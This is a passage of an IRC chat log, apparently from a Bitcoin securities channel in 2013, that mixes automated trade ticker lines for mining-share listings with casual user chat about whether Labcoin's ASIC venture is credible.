6.1143 BTC [-] Sep 05 20:58:47 [BTCTC] [LABCOIN] 300 @ 0.003304 = 0.9912 BTC [-] Sep 05 20:58:48 [BTCTC] [LABCOIN] 1432 @ 0.003301 = 4.727 BTC [-] Sep 05 20:58:49 [BTCTC] [LABCOIN] 1000 @ 0.003301 = 3.301 BTC [-] Sep 05 20:58:50 [BTCTC] [LABCOIN] 182 @ 0.0033 = 0.6006 BTC [-] Sep 05 20:58:51 [BTCTC] [LABCOIN] 1 @ 0.0033 BTC [-] Sep 05 20:58:52 [BTCTC] [LABCOIN] 5527 @ 0.0033 = 18.2391 BTC [-] Sep 05 20:58:53 [BTCTC] [LABCOIN] 20 @ 0.0033 = 0.066 BTC [-] Sep 05 20:58:54 [BTCTC] [LABCOIN] 257 @ 0.003291 = 0.8458 BTC [-] Sep 05 20:58:55 [BTCTC] [LABCOIN] 30 @ 0.00329 = 0.0987 BTC [-] Sep 05 20:58:56 [BTCTC] [LABCOIN] 1000 @ 0.003288 = 3.288 BTC [-] Sep 05 20:58:57 [BTCTC] [LABCOIN] 274 @ 0.003281 = 0.899 BTC [-] Sep 05 20:58:58 [BTCTC] [LABCOIN] 48 @ 0.00328 = 0.1574 BTC [-] Sep 05 20:59:37 labia Sep 05 21:01:06 [BTCTC] [ASICMINER-PT] 1 @ 2.178 BTC [-] Sep 05 21:01:07 [BTCTC] [ASICMINER-PT] 2 @ 2.178 = 4.356 BTC [-] Sep 05 21:02:23 [BTCTC] [LABCOIN] 1 @ 0.003487 BTC [+] Sep 05 21:02:57 [BTCTC] [ASICMINER-PT] 1 @ 2.178 BTC [-] Sep 05 21:03:32 [BTCTC] [ASICMINER-PT] 1 @ 2.178 BTC [-] Sep 05 21:03:33 [BTCTC] [ASICMINER-PT] 1 @ 2.177 BTC [-] Sep 05 21:03:35 [BTCTC] [ASICMINER-PT] 1 @ 2.176 BTC [-] Sep 05 21:03:36 [BTCTC] [ASICMINER-PT] 1 @ 2.148 BTC [-] Sep 05 21:03:37 [BTCTC] [ASICMINER-PT] 2 @ 2.147 = 4.294 BTC [-] Sep 05 21:03:38 [BTCTC] [ASICMINER-PT] 2 @ 2.146 = 4.292 BTC [-] Sep 05 21:03:51 [BTCTC] [LABCOIN] 5 @ 0.003487 = 0.0174 BTC [+] Sep 05 21:06:57 [BTCTC] [ASICMINER-PT] 1 @ 2.136 BTC [-] Sep 05 21:07:13 [BTCTC] [ASICMINER-PT] 1 @ 2.135 BTC [-] Sep 05 21:07:26 [HAVELOCK] [XBOND] 1 @ 0.00111995 BTC [-] Sep 05 21:07:32 [BTCTC] [ASICMINER-PT] 1 @ 2.131 BTC [-] Sep 05 21:07:52 [HAVELOCK] [XBOND] 1 @ 0.00111995 BTC [-] Sep 05 21:07:57 [BTCTC] [LABCOIN] 36 @ 0.003283 = 0.1182 BTC [-] Sep 05 21:07:58 [BTCTC] [LABCOIN] 145 @ 0.003282 = 0.4759 BTC [-] Sep 05 21:08:00 [BTCTC] [LABCOIN] 262 @ 0.003281 = 0.8596 BTC [-] Sep 05 21:08:01 [BTCTC] [LABCOIN] 51 @ 0.00328 = 0.1673 BTC [-] Sep 05 21:08:02 [BTCTC] [LABCOIN] 1000 @ 0.003278 = 3.278 BTC [-] Sep 05 21:08:18 [BTCTC] [LABCOIN] 200 @ 0.003278 = 0.6556 BTC [-] Sep 05 21:08:25 [BTCTC] [LABCOIN] 200 @ 0.003278 = 0.6556 BTC [-] Sep 05 21:08:39 [BTCTC] [ASICMINER-PT] 1 @ 2.13 BTC [-] Sep 05 21:08:42 [BTCTC] [LABCOIN] 200 @ 0.003278 = 0.6556 BTC [-] Sep 05 21:09:18 [BTCTC] [ACTIVEMINING] 10 @ 0.004696 = 0.047 BTC [+] Sep 05 21:09:19 [BTCTC] [ACTIVEMINING] 334 @ 0.004697 = 1.5688 BTC [+] Sep 05 21:09:21 [BTCTC] [ACTIVEMINING] 3000 @ 0.0047 = 14.1 BTC [+] Sep 05 21:09:22 [BTCTC] [ACTIVEMINING] 4112 @ 0.004799 = 19.7335 BTC [+] Sep 05 21:09:23 [BTCTC] [ACTIVEMINING] 2500 @ 0.0048 = 12 BTC [+] Sep 05 21:09:24 [BTCTC] [ACTIVEMINING] 546 @ 0.00481 = 2.6263 BTC [+] Sep 05 21:09:25 [BTCTC] [ACTIVEMINING] 48 @ 0.004844 = 0.2325 BTC [+] Sep 05 21:09:25 [BTCTC] [ACTIVEMINING] 48 @ 0.004949 = 0.2376 BTC [+] Sep 05 21:09:27 [BTCTC] [ACTIVEMINING] 550 @ 0.004985 = 2.7418 BTC [+] Sep 05 21:09:27 [BTCTC] [ACTIVEMINING] 130 @ 0.00499 = 0.6487 BTC [+] Sep 05 21:09:28 [BTCTC] [ACTIVEMINING] 500 @ 0.004999 = 2.4995 BTC [+] Sep 05 21:09:29 [BTCTC] [ACTIVEMINING] 100 @ 0.005 = 0.5 BTC [+] Sep 05 21:13:50 [BTCTC] [CRYPTO-TRADE] 6 @ 0.198 = 1.188 BTC [-] Sep 05 21:14:23 actually this propagandhi shit's not all that bad. Sep 05 21:16:30 they vary in style over time Sep 05 21:16:37 more recent stuff is harder and more political Sep 05 21:16:54 old stuff is lighter and more digestible (to some) Sep 05 21:16:54 [HAVELOCK] [SMG] 129 @ 0.00022 = 0.0284 BTC [-] Sep 05 21:17:07 they are def a top 10 band for me Sep 05 21:17:33 and i say that regardless of the lyrical meaning Sep 05 21:17:36 im too ecclectic to be able to have tops Sep 05 21:17:52 i just assume something ive listened to a bajillion times is a top 10 Sep 05 21:17:53 :) Sep 05 21:19:30 :p Sep 05 21:19:49 notsure im ready to put elevator musing in the top. Sep 05 21:23:10 [BTCTC] [ACTIVEMINING] 4 @ 0.004996 = 0.02 BTC [-] Sep 05 21:24:30 [HAVELOCK] [SMG] 1 @ 0.0002298 BTC [+] Sep 05 21:24:33 [BTCTC] [DMS.MINING] 310 @ 0.002391 = 0.7412 BTC [-] Sep 05 21:26:47 [BTCTC] [ASICMINER-PT] 1 @ 2.152 BTC [+] Sep 05 21:26:49 [BTCTC] [ASICMINER-PT] 3 @ 2.151 = 6.453 BTC [-] Sep 05 21:26:50 [BTCTC] [ASICMINER-PT] 5 @ 2.15 = 10.75 BTC [-] Sep 05 21:26:51 [BTCTC] [ASICMINER-PT] 1 @ 2.112 BTC [-] Sep 05 21:26:52 [BTCTC] [ASICMINER-PT] 2 @ 2.111 = 4.222 BTC [-] Sep 05 21:27:06 [BTCTC] [CRYPTO-TRADE] 5 @ 0.199 = 0.995 BTC [+] Sep 05 21:27:43 hey assbot, are you fed with data or are you pulling it? Sep 05 21:28:58 [BTCTC] [LABCOIN] 2 @ 0.003399 = 0.0068 BTC [+] Sep 05 21:29:11 [BTCTC] [DMS.SELLING] 8 @ 0.00975 = 0.078 BTC [+] Sep 05 21:29:33 dexX7 eta on ciphermine pt? Sep 05 21:30:02 as soon as possible Sep 05 21:30:07 [BTCTC] [LABCOIN] 12 @ 0.003397 = 0.0408 BTC [-] Sep 05 21:30:08 [HAVELOCK] [AM100] 2 @ 0.0215 = 0.043 BTC [-] Sep 05 21:30:09 still admin locked Sep 05 21:30:13 <3 Sep 05 21:33:12 [BTCTC] [PETA-MINE] 2 @ 0.6589 = 1.3178 BTC [-] Sep 05 21:35:22 [BTCTC] [ASICMINER-PT] 3 @ 2.115 = 6.345 BTC [+] Sep 05 21:35:23 [BTCTC] [ASICMINER-PT] 2 @ 2.114 = 4.228 BTC [-] Sep 05 21:36:52 [BTCTC] [CB.IDIFF-O] 1 @ 0.0094 BTC [+] Sep 05 21:38:38 dexX7 fed. Sep 05 21:41:46 [BTCTC] [DMS.MINING] 203 @ 0.002391 = 0.4854 BTC [-] Sep 05 21:42:47 [BTCTC] [LABCOIN] 2 @ 0.003372 = 0.0067 BTC [-] Sep 05 21:43:08 [BTCTC] [DMS.SELLING] 22 @ 0.0098 = 0.2156 BTC [+] Sep 05 21:43:18 [BTCTC] [DMS.SELLING] 2 @ 0.00975 = 0.0195 BTC [-] Sep 05 21:49:28 [BTCTC] [ASICMINER-PT] 1 @ 2.116 BTC [+] Sep 05 21:49:30 [BTCTC] [ASICMINER-PT] 1 @ 2.115 BTC [-] Sep 05 21:49:31 [BTCTC] [ASICMINER-PT] 2 @ 2.112 = 4.224 BTC [-] Sep 05 21:50:58 [BTCTC] [TAT.ASICMINER] 9 @ 0.0209 = 0.1881 BTC [-] Sep 05 21:50:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.02032 BTC [-] Sep 05 21:51:01 [BTCTC] [TAT.ASICMINER] 12 @ 0.02014 = 0.2417 BTC [-] Sep 05 21:51:02 [BTCTC] [TAT.ASICMINER] 5 @ 0.02013 = 0.1007 BTC [-] Sep 05 21:52:12 [BTCTC] [TAT.ASICMINER] 11 @ 0.02013 = 0.2214 BTC [-] Sep 05 21:52:14 [BTCTC] [TAT.ASICMINER] 9 @ 0.02012 = 0.1811 BTC [-] Sep 05 21:52:14 [BTCTC] [TAT.ASICMINER] 8 @ 0.02012 = 0.161 BTC [-] Sep 05 21:57:39 [BTCTC] [DMS.PURCHASE] 1 @ 0.01214 BTC [-] Sep 05 21:59:02 [BTCTC] [ACTIVEMINING] 6 @ 0.004996 = 0.03 BTC [-] Sep 05 21:59:03 [BTCTC] [ACTIVEMINING] 261 @ 0.004997 = 1.3042 BTC [+] Sep 05 21:59:04 [BTCTC] [ACTIVEMINING] 1000 @ 0.005 = 5 BTC [+] Sep 05 21:59:05 [BTCTC] [ACTIVEMINING] 50 @ 0.005065 = 0.2533 BTC [+] Sep 05 21:59:07 [BTCTC] [ACTIVEMINING] 1 @ 0.0051 BTC [+] Sep 05 21:59:42 [BTCTC] [LTC-ATF.B2] 1 @ 0.01046 BTC [-] Sep 05 22:01:34 [BTCTC] [TAT.MINIGAME] 3 @ 0.000193 = 0.0006 BTC [-] Sep 05 22:03:31 [BTCTC] [TAT.ASICMINER] 3 @ 0.02014 = 0.0604 BTC [+] Sep 05 22:03:43 [BTCTC] [DMS.PURCHASE] 2 @ 0.01214 = 0.0243 BTC [-] Sep 05 22:04:28 [BTCTC] [DMS.PURCHASE] 8 @ 0.01214 = 0.0971 BTC [-] Sep 05 22:04:49 [BTCTC] [ACTIVEMINING] 1 @ 0.005145 BTC [+] Sep 05 22:05:03 [BTCTC] [BTC-BOND] 3 @ 0.009999 = 0.03 BTC [-] Sep 05 22:05:31 [BTCTC] [KENILWORTH] 1 @ 0.001796 BTC [+] Sep 05 22:05:45 [BTCTC] [NASTY-PT] 1 @ 0.002394 BTC [-] Sep 05 22:06:24 [BTCTC] [DMS.MINING] 1 @ 0.002398 BTC [+] Sep 05 22:07:57 [BTCTC] [BTC-BOND] 7 @ 0.009999 = 0.07 BTC [-] Sep 05 22:08:40 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.0006557 = 0.002 BTC [-] Sep 05 22:10:00 [BTCTC] [DMS.PURCHASE] 2 @ 0.01214 = 0.0243 BTC [-] Sep 05 22:11:11 [BTCTC] [DMS.PURCHASE] 1 @ 0.01214 BTC [-] Sep 05 22:11:35 [BTCTC] [DMS.MINING] 287 @ 0.002391 = 0.6862 BTC [-] Sep 05 22:12:04 [BTCTC] [DMS.MINING] 39 @ 0.0024 = 0.0936 BTC [+] Sep 05 22:12:22 wikipedia "Only in recent decades have historians made progress towards a dispassionate, scholarly assessment of the battle reconciling the previous narratives, which differed widely by nation." Sep 05 22:12:38 i'm like... yeah, right. only recently the current scholars have re-written it in terms palatable for us Sep 05 22:12:47 until now various other assholes did a very bad job of it. Sep 05 22:12:53 [BTCTC] [NASTY-PT] 1 @ 0.002394 BTC [-] Sep 05 22:14:16 [BTCTC] [ASICMINER-PT] 1 @ 2.112 BTC [-] Sep 05 22:14:17 [BTCTC] [ASICMINER-PT] 1 @ 2.102 BTC [-] Sep 05 22:14:18 [BTCTC] [ASICMINER-PT] 1 @ 2.101 BTC [-] Sep 05 22:14:26 [BTCTC] [ACTIVEMINING] 7 @ 0.005145 = 0.036 BTC [+] Sep 05 22:14:27 [BTCTC] [ACTIVEMINING] 33 @ 0.005146 = 0.1698 BTC [+] Sep 05 22:16:36 [BTCTC] [DMS.PURCHASE] 40 @ 0.01214 = 0.4856 BTC [-] Sep 05 22:16:46 [BTCTC] [DMS.PURCHASE] 69 @ 0.01214 = 0.8377 BTC [-] Sep 05 22:17:15 [BTCTC] [ACTIVEMINING] 228 @ 0.005146 = 1.1733 BTC [+] Sep 05 22:17:17 [BTCTC] [ACTIVEMINING] 1534 @ 0.005149 = 7.8986 BTC [+] Sep 05 22:17:18 [BTCTC] [ACTIVEMINING] 238 @ 0.005155 = 1.2269 BTC [+] Sep 05 22:18:08 [BTCTC] [KENILWORTH] 28 @ 0.001797 = 0.0503 BTC [+] Sep 05 22:18:38 [BTCTC] [KENILWORTH] 44 @ 0.001799 = 0.0792 BTC [+] Sep 05 22:18:50 [BTCTC] [TAT.ASICMINER] 5 @ 0.02084 = 0.1042 BTC [+] Sep 05 22:19:07 [BTCTC] [KENILWORTH] 8 @ 0.001799 = 0.0144 BTC [+] Sep 05 22:19:18 [BTCTC] [ACTIVEMINING] 217 @ 0.005152 = 1.118 BTC [-] Sep 05 22:20:49 [BTCTC] [DMS.PURCHASE] 9 @ 0.01215 = 0.1094 BTC [+] Sep 05 22:22:06 [BTCTC] [B.YABMC] 1 @ 0.002199 BTC [+] Sep 05 22:23:17 [BTCTC] [B.YABMC] 5 @ 0.0022 = 0.011 BTC [+] Sep 05 22:24:47 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.0006535 = 0.002 BTC [-] Sep 05 22:25:39 [BTCTC] [KENILWORTH] 42 @ 0.0018 = 0.0756 BTC [+] Sep 05 22:26:01 [BTCTC] [ASICMINER-PT] 1 @ 2.154 BTC [+] Sep 05 22:26:46 [BTCTC] [DMS.PURCHASE] 1 @ 0.01215 BTC [+] Sep 05 22:27:45 [HAVELOCK] [LABCO] 150 @ 0.00344 = 0.516 BTC [-] Sep 05 22:28:07 [HAVELOCK] [LABCO] 50 @ 0.00344 = 0.172 BTC [-] Sep 05 22:28:14 [HAVELOCK] [LABCO] 78 @ 0.0032 = 0.2496 BTC [-] Sep 05 22:28:27 [BTCTC] [NASTY-PT] 4 @ 0.002391 = 0.0096 BTC [-] Sep 05 22:30:20 [BTCTC] [BASIC-MINING] 5 @ 0.1301 = 0.6505 BTC [-] Sep 05 22:30:20 [BTCTC] [BASIC-MINING] 1 @ 0.13 BTC [-] Sep 05 22:30:33 [BTCTC] [LABCOIN] 5 @ 0.003349 = 0.0167 BTC [-] Sep 05 22:30:34 [BTCTC] [LABCOIN] 5 @ 0.00335 = 0.0168 BTC [+] Sep 05 22:32:03 [BTCTC] [ASICMINER-PT] 1 @ 2.15 BTC [-] Sep 05 22:32:15 [BTCTC] [BASIC-MINING] 1 @ 0.1399 BTC [+] Sep 05 22:33:46 [BTCTC] [DMS.PURCHASE] 4 @ 0.01215 = 0.0486 BTC [+] Sep 05 22:33:58 [BTCTC] [LABCOIN] 85 @ 0.003403 = 0.2893 BTC [+] Sep 05 22:34:50 [BTCTC] [ACTIVEMINING] 1 @ 0.005152 BTC [-] Sep 05 22:35:18 [BTCTC] [NASTY-PT] 30 @ 0.002391 = 0.0717 BTC [-] Sep 05 22:35:54 [BTCTC] [B.YABMC] 1 @ 0.0022 BTC [+] Sep 05 22:37:20 [BTCTC] [LABCOIN] 2 @ 0.003397 = 0.0068 BTC [-] Sep 05 22:37:43 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0006534 = 0.0013 BTC [-] Sep 05 22:38:14 [BTCTC] [ASICMINER-PT] 1 @ 2.213 BTC [+] Sep 05 22:42:57 [HAVELOCK] [CFIG] 5 @ 0.148 = 0.74 BTC [+] Sep 05 22:43:27 [HAVELOCK] [DEALCO] 10 @ 0.01285 = 0.1285 BTC [-] Sep 05 22:44:13 [HAVELOCK] [LABCO] 25 @ 0.0035 = 0.0875 BTC [+] Sep 05 22:44:17 [HAVELOCK] [LABCO] 48 @ 0.0035 = 0.168 BTC [+] Sep 05 22:44:37 [BTCTC] [BASIC-MINING] 10 @ 0.13 = 1.3 BTC [-] Sep 05 22:47:08 [HAVELOCK] [SDSTM] 5 @ 0.003289 = 0.0164 BTC [+] Sep 05 22:47:32 [BTCTC] [LTC-ATF.B2] 2 @ 0.01034 = 0.0207 BTC [-] Sep 05 22:48:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.0208 BTC [-] Sep 05 22:49:07 [HAVELOCK] [AM100] 2 @ 0.02199999 = 0.044 BTC [+] Sep 05 22:49:55 [HAVELOCK] [SMG] 90 @ 0.0002209 = 0.0199 BTC [-] Sep 05 22:50:25 [HAVELOCK] [SDSTM] 1 @ 0.00329 BTC [+] Sep 05 22:50:59 [HAVELOCK] [DEALCO] 5 @ 0.014689 = 0.0734 BTC [+] Sep 05 22:52:15 [BTCTC] [ACTIVEMINING] 1 @ 0.005152 BTC [-] Sep 05 22:54:26 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.0006588 = 0.004 BTC [+] Sep 05 22:59:44 how many TH is labia supposed to have online after this weekend? Sep 05 22:59:57 not a single photo or any data of the boards? Sep 05 23:00:13 not a single piece of data about the chips? Sep 05 23:00:14 MAOR PITURZ PLZ Sep 05 23:00:26 IJust got done explaining that to the Labcoinzorz. Sep 05 23:00:34 lol Sep 05 23:01:05 [HAVELOCK] [AM100] 3 @ 0.02199999 = 0.066 BTC [+] Sep 05 23:01:17 I'm midly interested in having divs for the next couple months, but I'm not about to drop coin on a venture that can't tell me specs days before they're going "live". Sep 05 23:01:36 wtf are they waiting for Sep 05 23:01:41 And I don't think they've accounted for electricity properly. Sep 05 23:01:52 even if they have just one board assembled it should already be hashing Sep 05 23:02:04 maybe they are waiting to see how high the price can go before they sell off their personal shares Sep 05 23:02:04 I agree. Sep 05 23:02:09 are they planning to preassemble everything then throw the switch? Sep 05 23:02:09 lol Sep 05 23:02:12 that's stupid Sep 05 23:02:26 I would think now to the 10th would be full speed ramp up Sep 05 23:02:39 Build a device, plug it in, start hashing, repeat. Sep 05 23:02:44 [HAVELOCK] [LABCO] 1 @ 0.0035 BTC [+] Sep 05 23:03:00 what if they throw the switch and nothing happens :p Sep 05 23:03:08 'unforeseen technical glitch' Sep 05 23:03:15 Dude, they aren't testing these chips. They could seriously just melt. Sep 05 23:03:26 This batch IS the "test" Sep 05 23:03:53 I guarentee you that's why they've gone from saying 6th to 4TH Sep 05 23:04:04 yeah Sep 05 23:04:12 They know that at least 33% of their chips are going to explode. Sep 05 23:04:15 i was always suspicious of their rolled cores design Sep 05 23:04:16 [HAVELOCK] [VTX] 1 @ 0.6 BTC [-] Sep 05 23:04:27 [HAVELOCK] [VTX] 1 @ 0.6038899 BTC [+] Sep 05 23:04:33 [HAVELOCK] [SMG] 8 @ 0.0002209 = 0.0018 BTC [-] Sep 05 23:04:49 No. Sep 05 23:04:55 No stfu and go back to your corner. Sep 05 23:05:38 Vbs noted that they took their single chip simulation and then multiplied it by 16 to get a "simulation" of what a full device would pull. Sep 05 23:06:37 As if power draw will simply scale linearly. Sep 05 23:06:50 dIABLOd3 hashes at 0th Sep 05 23:07:24 -1.00987th Sep 05 23:07:24 [BTCTC] [LABCOIN] 5 @ 0.003378 = 0.0169 BTC [-] Sep 05 23:07:25 [BTCTC] [LABCOIN] 5 @ 0.003379 = 0.0169 BTC [+] Sep 05 23:08:04 I think you're right though, ThickAsThieves. They're building anticipation and then going to drop the news as tightly to the launch date as possible. Sep 05 23:09:09 Labiacoin and ActiveSlaughter ftw Sep 05 23:09:16 [BTCTC] [ACTIVEMINING] 1 @ 0.004896 BTC [-] Sep 05 23:10:33 even if all this goes away tomorrow it's been a hell of a ride :p Sep 05 23:10:33 #bitcoin-OTC Sep 05 23:10:33 hello Sep 05 23:10:51 SergeantActiveSlaughter, to you! Sep 05 23:11:46 SAS! Sep 05 23:13:30 i'm wondering.. what will happen, if labcoin does show chips, but they are at best only decent? Sep 05 23:14:55 It will surge a bit then drop and once they start hashing, a bit of a surge again Sep 05 23:15:35 is labcoin a scam? Sep 05 23:15:40 lol Sep 05 23:15:41 people saying it is. Sep 05 23:15:47 Everything is a scam until proven otherwise Sep 05 23:15:48 We don't know. Sep 05 23:16:27 Sorta like Guilty until proven innocent Sep 05 23:16:37 The american way Sep 05 23:17:01 fuck america Sep 05 23:17:05 i hate it here. Sep 05 23:17:45 Move somewhere else. Sep 05 23:18:06 i wish i lived in america Sep 05 23:18:14 land of the free, home of the braves Sep 05 23:18:24 The braves suck Sep 05 23:18:25 [MPEX] [S.MPOE] 9050 @ 0.00089383 = 8.0892 BTC [-] Sep 05 23:18:25 Atlanta Braves, man. Sep 05 23:18:26 [MPEX] [S.MPOE] 943 @ 0.00089344 = 0.8425 BTC [-] Sep 05 23:18:36 << Lives in atlanta Sep 05 23:18:48 at least you got the joke Sep 05 23:18:58 Yeah Sep 05 23:19:08 rulother I'm about 1.5 hours east of you Sep 05 23:19:11 on I20 Sep 05 23:19:12 but shhh Sep 05 23:19:13 Sort of a double joke Sep 05 23:19:21 don't tell anyone Sep 05 23:19:25 Shhhh ok Sep 05 23:19:35 I20 sucks btw Sep 05 23:19:44 a little bit Sep 05 23:20:28 i spend about 2 hours every day on it Sep 05 23:20:38 because i work in birmingham Sep 05 23:21:19 [BTCTC] [BASIC-MINING] 10 @ 0.13 = 1.3 BTC [-] Sep 05 23:21:20 Nasty I would hate that comute every day of my life Sep 05 23:21:33 I actually work up in Alpharetta Sep 05 23:21:34 [BTCTC] [BITVPS] 100 @ 0.00216 = 0.216 BTC [+] Sep 05 23:21:48 [BTCTC] [ACTIVEMINING] 1 @ 0.005151 BTC [+] Sep 05 23:21:58 [BTCTC] [ACTIVEMINING] 3 @ 0.005151 = 0.0155 BTC [+] Sep 05 23:22:28 [BTCTC] [COGNITIVE] 1 @ 0.2886 BTC [+] Sep 05 23:22:37 [BTCTC] [ASICMINER-PT] 1 @ 2.18 BTC [-] Sep 05 23:22:45 ;;seen Namworld Sep 05 23:22:45 Namworld was last seen in #bitcoin-assets 15 hours, 3 minutes, and 25 seconds ago: BitVPS dividend paid and report published Sep 05 23:23:11 land of the free? lol Sep 05 23:25:15 Some Rage Against the Machine comes to mind Sep 05 23:25:49 [BTCTC] [ACTIVEMINING] 8 @ 0.005152 = 0.0412 BTC [+] Sep 05 23:26:24 Hello thestringpuller Sep 05 23:27:05 [BTCTC] [DMS.SELLING] 70 @ 0.01003 = 0.7021 BTC [+] Sep 05 23:30:07 [BTCTC] [ACTIVEMINING] 1 @ 0.004902 BTC [-] Sep 05 23:31:26 [BTCTC] [ACTIVEMINING] 1 @ 0.004902 BTC [-] Sep 05 23:31:39 [HAVELOCK] [AM100] 1 @ 0.02199999 BTC [+] Sep 05 23:47:12 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.0006 = 0.03 BTC [-] Sep 05 23:47:56 [BTCTC] [TAT.VIRTUALMINE] 47 @ 0.0006 = 0.0282 BTC [-] Sep 05 23:51:57 [HAVELOCK] [XBOND] 5 @ 0.0011 = 0.0055 BTC [-] Sep 05 23:52:27 [BTCTC] [BASIC-MINING] 2 @ 0.13 = 0.26 BTC [-] Sep 05 23:52:29 [BTCTC] [BASIC-MINING] 1 @ 0.13 BTC [-] Sep 05 23:52:40 [HAVELOCK] [XBOND] 45 @ 0.00109 = 0.0491 BTC [-] Sep 05 23:52:57 I would think now to the 10th would be full speed ramp up << so cute, this. Sep 05 23:53:19 [BTCTC] [BASIC-MINING] 4 @ 0.13 = 0.52 BTC [-] Sep 05 23:54:52 [BTCTC] [TAT.ASICMINER] 16 @ 0.02071 = 0.3314 BTC [-] Sep 05 23:55:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.02071 BTC [-] Sep 05 23:59:11 [BTCTC] [S.BBET-PT] 10 @ 0.0014 = 0.014 BTC [-] Sep 05 23:59:12 [BTCTC] [S.BBET-PT] 191 @ 0.001301 = 0.2485 BTC [-] Sep 06 00:00:47 [BTCTC] [DMS.MINING] 1 @ 0.002281 BTC [-] Sep 06 00:00:48 [BTCTC] [DMS.MINING] 1 @ 0.002281 BTC [-] Sep 06 00:01:25 [BTCTC] [DMS.MINING] 1 @ 0.00228 BTC [-] Sep 06 00:01:39 [BTCTC] [TAT.ASICMINER] 8 @ 0.0207 = 0.1656 BTC [-] Sep 06 00:02:02 [BTCTC] [DMS.MINING] 41 @ 0.002275 = 0.0933 BTC [-] Sep 06 00:02:14 [BTCTC] [ACTIVEMINING] 2 @ 0.004914 = 0.0098 BTC [+] Sep 06 00:02:15 [BTCTC] [ACTIVEMINING] 10 @ 0.004913 = 0.0491 BTC [-] Sep 06 00:02:17 [BTCTC] [ACTIVEMINING] 30 @ 0.004887 = 0.1466 BTC [-] Sep 06 00:02:17 [BTCTC] [ACTIVEMINING] 90 @ 0.004886 = 0.4397 BTC [-] Sep 06 00:03:34 [BTCTC] [TAT.ASICMINER] 4 @ 0.02069 = 0.0828 BTC [-] Sep 06 00:03:35 [BTCTC] [TAT.ASICMINER] 10 @ 0.0207 = 0.207 BTC [+] Sep 06 00:04:21 [BTCTC] [LABCOIN] 68 @ 0.003375 = 0.2295 BTC [-] Sep 06 00:06:11 OMG ACTIVEMINING Sep 06 00:06:38 [BTCTC] [BASIC-MINING] 6 @ 0.1388 = 0.8328 BTC [+] Sep 06 00:07:24 [BTCTC] [ASICMINER-PT] 1 @ 2.167 BTC [-] Sep 06 00:08:54 the imaginary market in the btctc group of scammer's mind is valuing activeminer at 2.5x asicminer. Sep 06 00:09:05 because ac comes before as in an alphabetic listing. Sep 06 00:09:26 i saw a post on google+ yesterday Sep 06 00:09:37 telling me to BUY BUY BUY ACTIVEMINING Sep 06 00:09:40 After Earth? Sep 06 00:11:00 i will enjoy eating some labia after i've been actively slaughtered Sep 06 00:11:59 [BTCTC] [LABCOIN] 85 @ 0.00338 = 0.2873 BTC [+] Sep 06 00:12:05 what's with you and vulval parts ? Sep 06 00:12:10 [BTCTC] [ASICMINER-PT] 1 @ 2.131 BTC [-] Sep 06 00:12:11 [BTCTC] [ASICMINER-PT] 5 @ 2.131 = 10.655 BTC [-] Sep 06 00:12:24 never mind mp Sep 06 00:12:41 it's just the names of all these companies that gets me Sep 06 00:12:56 it's like a bunch of 5 year old got together to decide on them Sep 06 00:12:57 http://virtualminingcorp.com/pr130904.pdf Sep 06 00:13:05 something about activemining tl;dr Sep 06 00:13:44 [BTCTC] [LABCOIN] 85 @ 0.003379 = 0.2872 BTC [-] Sep 06 00:14:21 [HAVELOCK] [XBOND] 150 @ 0.00107302 = 0.161 BTC [-] Sep 06 00:15:20 [MPEX] [S.MPOE] 9750 @ 0.00089344 = 8.711 BTC [-] Sep 06 00:17:23 [BTCTC] [ASICMINER-PT] 1 @ 2.13 BTC [-] Sep 06 00:17:25 [BTCTC] [ASICMINER-PT] 1 @ 2.102 BTC [-] Sep 06 00:17:25 [BTCTC] [ASICMINER-PT] 1 @ 2.102 BTC [-] Sep 06 00:17:26 [BTCTC] [ASICMINER-PT] 2 @ 2.101 = 4.202 BTC [-] Sep 06 00:17:28 [BTCTC] [ASICMINER-PT] 3 @ 2.1 = 6.3 BTC [-] Sep 06 00:17:29 [BTCTC] [ASICMINER-PT] 2 @ 2.1 = 4.2 BTC [-] Sep 06 00:17:30 [BTCTC] [ASICMINER-PT] 1 @ 2.1 BTC [-] Sep 06 00:17:31 [BTCTC] [ASICMINER-PT] 2 @ 2.1 = 4.2 BTC [-] Sep 06 00:17:56 lolk Sep 06 00:18:08 [BTCTC] [BTC-GROWTH] 60 @ 0.1001 = 6.006 BTC [-] Sep 06 00:20:19 mircea_popescu: you as mr. everything-is-scam :) were you surprised after realizing actm is real? Sep 06 00:20:59 [HAVELOCK] [XBOND] 200 @ 0.00107302 = 0.2146 BTC [-] Sep 06 00:21:35 https://www.schneier.com/blog/archives/2013/09/the_nsa_is_brea.html Sep 06 00:21:38 Schneier on Security: The NSA Is Breaking Most Encryption on the Internet Sep 06 00:22:50 [BTCTC] [ACTIVEMINING] 90 @ 0.005109 = 0.4598 BTC [+] Sep 06 00:22:51 [BTCTC] [ACTIVEMINING] 48 @ 0.00511 = 0.2453 BTC [+] Sep 06 00:24:09 [BTCTC] [TAT.ASICMINER] 7 @ 0.02149 = 0.1504 BTC [+] Sep 06 00:24:09 [BTCTC] [TAT.ASICMINER] 3 @ 0.02149 = 0.0645 BTC [+] Sep 06 00:28:29 [BTCTC] [ACTIVEMINING] 4 @ 0.005097 = 0.0204 BTC [-] Sep 06 00:30:18 This press release contains forward-looking statements, including, without limitation, Sep 06 00:30:22 statements related to eASIC’s future sales and distribution of its NEW ASIC devices. Works Sep 06 00:30:22 such as “expects” and similar expressions are intended to identify forward-looking statements. Sep 06 00:31:07 vulval parts, indeed Sep 06 00:34:05 the question I guess becomes, at what point do you hold enough leverage over easic to get them to go public Sep 06 00:34:27 dexX7 i realised what ? Sep 06 00:34:51 an AIP, a PO, check cashed? Sep 06 00:35:12 make an effort and talk sense. Sep 06 00:35:29 [BTCTC] [DMS.PURCHASE] 4 @ 0.01215 = 0.0486 BTC [+] Sep 06 00:35:46 seems like they would want to be some way towards a working design before being so specific Sep 06 00:35:56 did teh ken character come down with acute intermittent porphyria ? Sep 06 00:36:18 [BTCTC] [LABCOIN] 1 @ 0.003392 BTC [+] Sep 06 00:36:21 agreement in principle, purchase order etc Sep 06 00:36:39 why these estra spaces before/after porphyria? something was edited out? Sep 06 00:36:44 *extra Sep 06 00:36:51 so wait. scammer makes five different fronts , has them dealing with each other and i am realising shit ? Sep 06 00:36:59 the one thing im realising is that you're too new to know usagi. Sep 06 